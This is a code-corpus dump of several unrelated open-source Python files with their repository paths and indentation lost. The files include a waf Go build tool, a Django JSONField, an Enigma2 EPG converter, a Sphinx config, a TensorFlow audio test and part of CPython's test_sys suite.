if isinstance(tsk, (go, gopackage, cgopackage)):
tsk.set_run_after(lnk_task)
tsk.dep_nodes.extend(lnk_task.outputs)
path = lnk_task.outputs[0].parent.abspath()
if isinstance(lnk_task, (go, gopackage)):
# handle hierarchical packages
path = lnk_task.generator.path.get_bld().abspath()
elif isinstance(lnk_task, (cgopackage,)):
# handle hierarchical cgopackages
cgo_obj_dir = lnk_task.outputs[1].find_or_declare('_obj')
path = cgo_obj_dir.abspath()
# recursively add parent GOCFLAGS...
self.env.append_unique('GOCFLAGS',
getattr(lnk_task.env, 'GOCFLAGS',[]))
# ditto for GOLFLAGS...
self.env.append_unique('GOLFLAGS',
getattr(lnk_task.env, 'GOLFLAGS',[]))
self.env.append_unique('GOCFLAGS', ['-I%s' % path])
self.env.append_unique('GOLFLAGS', ['-L%s' % path])
for n in getattr(tg, 'includes_nodes', []):
self.env.append_unique('GOCFLAGS', ['-I%s' % n.abspath()])
pass
pass
def configure(conf):
def set_def(var, val):
if not conf.env[var]:
conf.env[var] = val
goarch = os.getenv('GOARCH')
if goarch == '386':
set_def('GO_PLATFORM', 'i386')
elif goarch == 'amd64':
set_def('GO_PLATFORM', 'x86_64')
elif goarch == 'arm':
set_def('GO_PLATFORM', 'arm')
else:
set_def('GO_PLATFORM', platform.machine())
if conf.env.GO_PLATFORM == 'x86_64':
set_def('GO_COMPILER', '6g')
set_def('GO_LINKER', '6l')
elif conf.env.GO_PLATFORM in ('i386', 'i486', 'i586', 'i686'):
set_def('GO_COMPILER', '8g')
set_def('GO_LINKER', '8l')
elif conf.env.GO_PLATFORM == 'arm':
set_def('GO_COMPILER', '5g')
set_def('GO_LINKER', '5l')
set_def('GO_EXTENSION', '.5')
if not (conf.env.GO_COMPILER or conf.env.GO_LINKER):
raise conf.fatal('Unsupported platform ' + platform.machine())
set_def('GO_PACK', 'gopack')
set_def('gopackage_PATTERN', '%s.a')
set_def('CPPPATH_ST', '-I%s')
set_def('GOMAKE_FLAGS', ['--quiet'])
conf.find_program(conf.env.GO_COMPILER, var='GOC')
conf.find_program(conf.env.GO_LINKER, var='GOL')
conf.find_program(conf.env.GO_PACK, var='GOP')
conf.find_program('cgo', var='CGO')
TaskGen.feature('go')(process_use)
TaskGen.feature('go')(propagate_uselib_vars)
|
Vogtinator/micropython
|
refs/heads/nspire
|
tests/import/pkg3/subpkg1/mod1.py
|
118
|
print("subpkg1.mod1 __name__:", __name__)
from ..mod2 import foo
|
thomazs/geraldo
|
refs/heads/master
|
site/newsite/django_1_0/django/contrib/djangoplus/fieldtypes/__init__.py
|
9
|
import datetime
from django.db import models
from django.db.models import signals
from django.conf import settings
from django.utils import simplejson as json
from django.dispatch import dispatcher
"""
JSONField: http://www.djangosnippets.org/snippets/377/
"""
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime('%Y-%m-%d')
elif isinstance(obj, datetime.time):
return obj.strftime('%H:%M:%S')
return json.JSONEncoder.default(self, obj)
def dumps(data):
return JSONEncoder().encode(data)
def loads(str):
return json.loads(str, encoding=settings.DEFAULT_CHARSET)
class JSONField(models.TextField):
def db_type(self):
return 'text'
def pre_save(self, model_instance, add):
value = getattr(model_instance, self.attname, None)
return dumps(value)
def contribute_to_class(self, cls, name):
super(JSONField, self).contribute_to_class(cls, name)
dispatcher.connect(self.post_init, signal=signals.post_init, sender=cls)
def get_json(model_instance):
return dumps(getattr(model_instance, self.attname, None))
setattr(cls, 'get_%s_json' % self.name, get_json)
def set_json(model_instance, json):
return setattr(model_instance, self.attname, loads(json))
setattr(cls, 'set_%s_json' % self.name, set_json)
def post_init(self, instance=None):
value = self.value_from_object(instance)
if (value):
setattr(instance, self.attname, loads(value))
else:
setattr(instance, self.attname, None)
|
TwolDE2/enigma2
|
refs/heads/6.2
|
lib/python/Components/Converter/EventTime.py
|
52
|
from Converter import Converter
from Poll import Poll
from time import time
from Components.Element import cached, ElementError
from Components.config import config
from enigma import eEPGCache
class EventTime(Poll, Converter, object):
STARTTIME = 0
ENDTIME = 1
REMAINING = 2
REMAINING_VFD = 3
PROGRESS = 4
DURATION = 5
ELAPSED = 6
ELAPSED_VFD = 7
NEXT_START_TIME = 8
NEXT_END_TIME = 9
NEXT_DURATION = 10
THIRD_START_TIME = 11
THIRD_END_TIME = 12
THIRD_DURATION = 13
def __init__(self, type):
Converter.__init__(self, type)
Poll.__init__(self)
self.epgcache = eEPGCache.getInstance()
if type == "EndTime":
self.type = self.ENDTIME
elif type == "Remaining":
self.type = self.REMAINING
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "VFDRemaining":
self.type = self.REMAINING_VFD
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "StartTime":
self.type = self.STARTTIME
elif type == "Duration":
self.type = self.DURATION
elif type == "Progress":
self.type = self.PROGRESS
self.poll_interval = 30*1000
self.poll_enabled = True
elif type == "Elapsed":
self.type = self.ELAPSED
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "VFDElapsed":
self.type = self.ELAPSED_VFD
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "NextStartTime":
self.type = self.NEXT_START_TIME
elif type == "NextEndTime":
self.type = self.NEXT_END_TIME
elif type == "NextDurartion":
self.type = self.NEXT_DURATION
elif type == "ThirdStartTime":
self.type = self.THIRD_START_TIME
elif type == "ThirdEndTime":
self.type = self.THIRD_END_TIME
elif type == "ThirdDurartion":
self.type = self.THIRD_DURATION
else:
raise ElementError("'%s' is not <StartTime|EndTime|Remaining|Elapsed|Duration|Progress> for EventTime converter" % type)
@cached
def getTime(self):
assert self.type != self.PROGRESS
event = self.source.event
if event is None:
return None
st = event.getBeginTime()
if self.type == self.STARTTIME:
return st
duration = event.getDuration()
if self.type == self.DURATION:
return duration
st += duration
if self.type == self.ENDTIME:
return st
if self.type == self.REMAINING or self.type == self.REMAINING_VFD or self.type == self.ELAPSED or self.type == self.ELAPSED_VFD:
now = int(time())
remaining = st - now
if remaining < 0:
remaining = 0
start_time = event.getBeginTime()
end_time = start_time + duration
elapsed = now - start_time
if start_time <= now <= end_time:
if self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
else:
return duration, None
elif self.type == self.NEXT_START_TIME or self.type == self.NEXT_END_TIME or self.type == self.NEXT_DURATION or self.type == self.THIRD_START_TIME or self.type == self.THIRD_END_TIME or self.type == self.THIRD_DURATION:
reference = self.source.service
info = reference and self.source.info
if info is None:
return
test = [ 'IBDCX', (reference.toString(), 1, -1, 1440) ] # search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
try:
if self.type == self.NEXT_START_TIME and self.list[1][1]:
return self.list[1][1]
elif self.type == self.NEXT_END_TIME and self.list[1][1] and self.list[1][2]:
return int(self.list[1][1]) + int(self.list[1][2])
elif self.type == self.THIRD_START_TIME and self.list[2][1]:
return self.list[2][1]
elif self.type == self.THIRD_END_TIME and self.list[2][1] and self.list[2][2]:
return int(self.list[2][1]) + int(self.list[2][2])
else:
# failed to return any epg data.
return None
except:
# failed to return any epg data.
return None
@cached
def getValue(self):
assert self.type == self.PROGRESS
event = self.source.event
if event is None:
return None
progress = int(time()) - event.getBeginTime()
duration = event.getDuration()
if duration > 0 and progress >= 0:
if progress > duration:
progress = duration
return progress * 1000 / duration
else:
return None
time = property(getTime)
value = property(getValue)
range = 1000
def changed(self, what):
Converter.changed(self, what)
if self.type == self.PROGRESS and len(self.downstream_elements):
if not self.source.event and self.downstream_elements[0].visible:
self.downstream_elements[0].visible = False
elif self.source.event and not self.downstream_elements[0].visible:
self.downstream_elements[0].visible = True
|
rcritten/novajoin
|
refs/heads/master
|
doc/source/conf.py
|
1
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import sphinx_rtd_theme
import pbr.version
version_info = pbr.version.VersionInfo('novajoin')
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'novajoin'
copyright = u'2016, Red Hat'
author = 'Rob Crittenden'
# The short X.Y version.
version = version_info.version_string()
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'Red Hat', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
futuresystems/465-git4hiroaki
|
refs/heads/master
|
HW3/hshioi_cloudmesh_ex2.py
|
4
|
# coding: utf-8
import cloudmesh
print cloudmesh.shell("cloud list")
print cloudmesh.shell("cloud on india")
print cloudmesh.shell("cloud list")
|
whn09/tensorflow
|
refs/heads/master
|
tensorflow/contrib/ffmpeg/encode_audio_op_test.py
|
75
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for third_party.tensorflow.contrib.ffmpeg.encode_audio_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
from tensorflow.contrib import ffmpeg
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
class EncodeAudioOpTest(test.TestCase):
def _compareWavFiles(self, original, encoded):
"""Compares the important bits of two WAV files.
Some encoders will create a slightly different header to the WAV file.
This compares only the important bits of the header as well as the contents.
Args:
original: Contents of the original .wav file.
encoded: Contents of the new, encoded .wav file.
"""
self.assertLess(44, len(original))
self.assertLess(44, len(encoded))
self.assertEqual(original[:4], encoded[:4])
# Skip file size
self.assertEqual(original[8:16], encoded[8:16])
# Skip header size
self.assertEqual(original[20:36], encoded[20:36])
# Skip extra bits inserted by ffmpeg.
self.assertEqual(original[original.find(b'data'):],
encoded[encoded.find(b'data'):])
def testRoundTrip(self):
"""Reads a wav file, writes it, and compares them."""
with self.test_session():
path = os.path.join(resource_loader.get_data_files_path(),
'testdata/mono_10khz.wav')
with open(path, 'rb') as f:
original_contents = f.read()
audio_op = ffmpeg.decode_audio(
original_contents,
file_format='wav',
samples_per_second=10000,
channel_count=1)
encode_op = ffmpeg.encode_audio(
audio_op, file_format='wav', samples_per_second=10000)
encoded_contents = encode_op.eval()
self._compareWavFiles(original_contents, encoded_contents)
if __name__ == '__main__':
test.main()
|
mancoast/CPythonPyc_test
|
refs/heads/master
|
fail/340_test_sys.py
|
3
|
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
